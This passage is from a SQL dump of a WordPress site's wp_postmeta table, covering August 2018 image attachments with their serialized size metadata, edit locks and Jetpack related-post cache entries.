(8034, 3596, '_wp_attached_file', '2018/08/7-8-2561-10-01-12.jpg'),
(8035, 3596, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:954;s:6:\"height\";i:641;s:4:\"file\";s:29:\"2018/08/7-8-2561-10-01-12.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-8-2561-10-01-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"7-8-2561-10-01-12-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"7-8-2561-10-01-12-768x516.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-8-2561-10-01-12-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8036, 3597, '_wp_attached_file', '2018/08/7-8-2561-10-00-50.jpg'),
(8037, 3597, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:953;s:6:\"height\";i:644;s:4:\"file\";s:29:\"2018/08/7-8-2561-10-00-50.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-8-2561-10-00-50-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"7-8-2561-10-00-50-300x203.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"7-8-2561-10-00-50-768x519.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:519;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-8-2561-10-00-50-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8038, 3598, '_wp_attached_file', '2018/08/7-8-2561-9-34-15.jpg'),
(8039, 3598, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:192;s:6:\"height\";i:239;s:4:\"file\";s:28:\"2018/08/7-8-2561-9-34-15.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"7-8-2561-9-34-15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8040, 3599, '_wp_attached_file', '2018/08/7-8-2561-9-29-27.jpg'),
(8041, 3599, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:155;s:4:\"file\";s:28:\"2018/08/7-8-2561-9-29-27.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"7-8-2561-9-29-27-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"7-8-2561-9-29-27-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"7-8-2561-9-29-27-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8042, 3586, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575630630;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4964;}i:1;a:1:{s:2:\"id\";i:5298;}i:2;a:1:{s:2:\"id\";i:4718;}}}}'),
(8043, 3573, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575298847;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5194;}i:1;a:1:{s:2:\"id\";i:4687;}i:2;a:1:{s:2:\"id\";i:5169;}}}}'),
(8044, 3577, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575406277;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4765;}i:1;a:1:{s:2:\"id\";i:4887;}i:2;a:1:{s:2:\"id\";i:4964;}}}}'),
(8045, 3603, '_wp_attached_file', '2018/08/1.jpg'),
(8046, 3603, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:956;s:6:\"height\";i:628;s:4:\"file\";s:13:\"2018/08/1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"1-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"1-768x505.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"1-400x263.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:263;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8047, 3604, '_wp_attached_file', '2018/08/2.jpg'),
(8048, 3604, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:957;s:6:\"height\";i:625;s:4:\"file\";s:13:\"2018/08/2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"2-300x196.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"2-768x502.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:502;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"2-400x261.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8049, 3607, '_wp_attached_file', '2018/08/8-8-2561-11-26-44.jpg'),
(8050, 3607, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:959;s:6:\"height\";i:624;s:4:\"file\";s:29:\"2018/08/8-8-2561-11-26-44.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-8-2561-11-26-44-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"8-8-2561-11-26-44-300x195.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"8-8-2561-11-26-44-768x500.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"8-8-2561-11-26-44-400x260.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8051, 3610, '_wp_attached_file', '2018/08/8-8-2561-11-39-38.jpg'),
(8052, 3610, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:238;s:6:\"height\";i:312;s:4:\"file\";s:29:\"2018/08/8-8-2561-11-39-38.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-8-2561-11-39-38-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"8-8-2561-11-39-38-229x300.jpg\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"8-8-2561-11-39-38-229x300.jpg\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8053, 3581, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575370271;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5855;}i:1;a:1:{s:2:\"id\";i:4687;}i:2;a:1:{s:2:\"id\";i:6158;}}}}'),
(8054, 3613, '_wp_attached_file', '2018/08/1-1.jpg'),
(8055, 3613, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:954;s:6:\"height\";i:625;s:4:\"file\";s:15:\"2018/08/1-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1-1-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-1-768x503.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:503;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-1-400x262.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8056, 3614, '_wp_attached_file', '2018/08/2-1.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(8057, 3614, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:953;s:6:\"height\";i:307;s:4:\"file\";s:15:\"2018/08/2-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"2-1-300x97.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:97;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-1-768x247.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:247;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"2-1-400x129.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:129;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8058, 3568, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575221580;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4073;}i:1;a:1:{s:2:\"id\";i:5094;}i:2;a:1:{s:2:\"id\";i:6330;}}}}'),
(8059, 3617, '_edit_lock', '1534225406:2'),
(8060, 3617, '_edit_last', '2'),
(8061, 3617, '_hide_featured', NULL),
(8077, 3626, '_edit_lock', '1537253287:3'),
(8078, 3626, '_edit_last', '3'),
(8079, 3626, '_hide_featured', NULL),
(8080, 3633, '_edit_lock', '1533872142:3'),
(8081, 3633, '_edit_last', '3'),
(8082, 3634, '_wp_attached_file', '2018/08/38823690_650357482007110_3022558671642034176_o.jpg'),
(8083, 3634, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/08/38823690_650357482007110_3022558671642034176_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"38823690_650357482007110_3022558671642034176_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"38823690_650357482007110_3022558671642034176_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"38823690_650357482007110_3022558671642034176_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"38823690_650357482007110_3022558671642034176_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"38823690_650357482007110_3022558671642034176_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8084, 3633, '_thumbnail_id', '3634'),
(8088, 3633, '_hide_featured', NULL),
(8089, 3633, '_wpas_done_all', '1'),
(8090, 3637, '_thumbnail_id', '3634'),
(8091, 3637, '_edit_lock', '1534221082:3'),
(8092, 3637, '_edit_last', '3'),
(8099, 3637, '_hide_featured', NULL),
(8100, 3637, '_wpas_done_all', '1'),
(8101, 3633, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575149021;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3988;}i:1;a:1:{s:2:\"id\";i:5301;}i:2;a:1:{s:2:\"id\";i:6152;}}}}'),
(8102, 3637, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575542705;s:7:\"payload\";a:0:{}}}'),
(8105, 3642, '_edit_lock', '1534324410:3'),
(8106, 3642, '_edit_last', '3'),
(8107, 3643, '_wp_attached_file', '2018/08/10-8-2561-9-59-57.jpg'),
(8108, 3643, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:451;s:6:\"height\";i:606;s:4:\"file\";s:29:\"2018/08/10-8-2561-9-59-57.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"10-8-2561-9-59-57-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"10-8-2561-9-59-57-223x300.jpg\";s:5:\"width\";i:223;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"10-8-2561-9-59-57-223x300.jpg\";s:5:\"width\";i:223;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8112, 3642, '_hide_featured', NULL),
(8113, 3642, '_wpas_done_all', '1'),
(8116, 3648, '_edit_lock', '1534324405:3'),
(8117, 3648, '_edit_last', '3'),
(8118, 3649, '_wp_attached_file', '2018/08/10-8-2561-9-59-57-1.jpg'),
(8119, 3649, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:451;s:6:\"height\";i:606;s:4:\"file\";s:31:\"2018/08/10-8-2561-9-59-57-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"10-8-2561-9-59-57-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"10-8-2561-9-59-57-1-223x300.jpg\";s:5:\"width\";i:223;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"10-8-2561-9-59-57-1-223x300.jpg\";s:5:\"width\";i:223;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8123, 3648, '_hide_featured', NULL),
(8124, 3648, '_wpas_done_all', '1'),
(8129, 3657, '_wp_attached_file', '2018/08/38721602_650381032004755_6844780124257124352_o.jpg'),
(8130, 3657, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/08/38721602_650381032004755_6844780124257124352_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"38721602_650381032004755_6844780124257124352_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"38721602_650381032004755_6844780124257124352_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"38721602_650381032004755_6844780124257124352_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"38721602_650381032004755_6844780124257124352_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"38721602_650381032004755_6844780124257124352_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8131, 3642, '_thumbnail_id', '3657'),
(8139, 3660, '_wp_attached_file', '2018/08/38721602_650381032004755_6844780124257124352_o-2.jpg'),
(8140, 3660, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:60:\"2018/08/38721602_650381032004755_6844780124257124352_o-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"38721602_650381032004755_6844780124257124352_o-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"38721602_650381032004755_6844780124257124352_o-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"38721602_650381032004755_6844780124257124352_o-2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"38721602_650381032004755_6844780124257124352_o-2-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"38721602_650381032004755_6844780124257124352_o-2-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8141, 3642, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575594178;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5625;}i:1;a:1:{s:2:\"id\";i:4765;}i:2;a:1:{s:2:\"id\";i:3925;}}}}'),
(8142, 3648, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575416787;s:7:\"payload\";a:0:{}}}'),
(8191, 3692, '_edit_lock', '1534230526:3'),
(8192, 3692, '_edit_last', '3'),
(8193, 3693, '_wp_attached_file', '2018/08/38888283_652396778469847_617048704351731712_o.jpg'),
(8194, 3693, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:57:\"2018/08/38888283_652396778469847_617048704351731712_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"38888283_652396778469847_617048704351731712_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"38888283_652396778469847_617048704351731712_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"38888283_652396778469847_617048704351731712_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"38888283_652396778469847_617048704351731712_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"38888283_652396778469847_617048704351731712_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\